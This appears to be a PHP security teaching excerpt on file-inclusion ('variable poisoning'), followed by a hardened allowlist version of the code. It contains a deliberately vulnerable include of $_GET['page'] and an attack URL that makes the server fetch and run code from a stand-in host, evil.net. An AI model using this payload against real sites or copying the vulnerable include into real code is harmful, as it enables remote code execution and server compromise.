Variable Poisoning :: Chapter 1
Expected URL:
http://example.org/?page=news.php&id=1234
if (file_exists($_GET['page'])) {
    include $_GET['page'];
}
Attack:
./?page=ftp://user:pass@evil.net/arbitrary_code.php
<?php
// insert evil code here
?>
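Hardened counterpart to the include above, as an added example that is not part of the original slides: the request value is only used as a lookup key into a fixed table, so a URL such as the ftp:// one never reaches include. The page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed allowlist: request value => file under PAGE_DIR (hypothetical names).
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = [
    'news.php'  => 'news.php',
    'about.php' => 'about.php',
];

/**
 * Map the untrusted ?page= value to a local file path.
 * Returns null for anything that is not an exact allowlist key.
 */
function resolve_page($requested): ?string
{
    // ?page[]=x arrives as an array; only plain strings are considered.
    if (!is_string($requested)) {
        return null;
    }
    // Exact-match lookup: "ftp://user:pass@evil.net/arbitrary_code.php",
    // "../config.php" and "news.php%00" are simply not keys in the table.
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    // The path is built from the table entry, never from the request.
    $path = PAGE_DIR . '/' . ALLOWED_PAGES[$requested];

    // is_file() here only guards against a missing local file;
    // it is not the security check (file_exists() was not one either).
    return is_file($path) ? $path : null;
}

$path = resolve_page($_GET['page'] ?? null);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

Setting allow_url_include = Off in php.ini is a useful second layer, but the allowlist is what keeps local paths such as ../config.php out of include as well.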